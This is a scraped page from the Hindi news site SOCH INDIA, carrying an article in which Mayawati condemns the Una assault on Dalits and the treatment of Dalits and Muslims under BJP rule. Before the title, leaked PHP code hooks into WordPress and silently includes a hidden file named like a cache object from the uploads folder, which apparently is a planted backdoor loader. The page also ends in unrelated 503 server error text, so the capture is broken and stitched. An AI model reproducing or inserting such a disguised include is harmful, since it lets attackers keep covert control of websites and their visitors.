add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ‘BJP शासन में दलित व मुस्लिमों का उत्पीड़न चिंताजनक’ – SOCH INDIA
Menu

राजनीति
‘BJP शासन में दलित व मुस्लिमों का उत्पीड़न चिंताजनक’

nobanner

'BJP शासन में दलित व मुस्लिमों का उत्पीड़न चिंताजनक'

लखनऊ: बहुजन समाज पार्टी की राष्ट्रीय अध्यक्ष, सांसद (राज्यसभा) व पूर्व मुख्यमंत्री, उत्तर प्रदेश मायावती ने गुजरात राज्य के ऊना जिले में ‘गौरक्षा’ के नाम पर मरी हुई गाय का चमड़ा उतारने वाले गरीब दलित समाज के लोगों के खिलाफ बर्बर व अमानवीय व्यवहार करने की घटना की निन्दा करते कहा कि इस प्रकार की अनेकों घटनाओं से बसपा का यह आरोप सही साबित होता है कि केन्द्र में भाजपा की वर्तमान सरकार बनने के बाद दलितों, पिछड़ों व धार्मिक अल्पसंख्यकों में से खासकर मुस्लिम समाज के साथ भेदभाव, उनका शोषण व उत्पीडऩ काफी ज्यादा बढ़ा है और धीरे-धीरे यह स्थिति भयावह रूप लेती जा रही है जो अत्यन्त ही चिन्ताजनक है।
इस अवसर पर बसपा सुप्रीमो मायावती ने कहा कि केन्द्र की वर्तमान सरकार के आने के बाद खासकर आर.एस.एस. से जुड़े कट्टरवादी संगठनों के लोग अपने आपको संविधान व कानून से ऊपर मानकर काम करने लगे हैं। यही कारण है कि खासकर भाजपा शासित राज्यों में वे लोग खुलेआम कानून को अपने हाथ में लेकर उन्माद व उपद्रव का वीभत्स प्रदर्शन लगातार करते रहते हैं।

इतना ही नहीं, भाजपा शासित मध्य प्रदेश में दलितों व आदिवासी समाज के लोगों के साथ भेदभाव, उनकी उपेक्षा व उनके हित व कल्याण की घोर उपेक्षा करने का मामला खुले तौर पर सामने आकर उसका विरोध हुआ है। वहां के एक वरिष्ठ आई.ए.एस. अफ सर ने मध्य प्रदेश के मुख्यमंत्री शिवराज सिंह चौहान को लिखकर इन मामलों में आपत्ति जताई है और अब उन्हें प्रताडि़त करने की तैयारी है, जैसा कि हैदराबाद के पीएच.डी. स्कॉलर रोहित वेमूला के साथ किया गया था।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.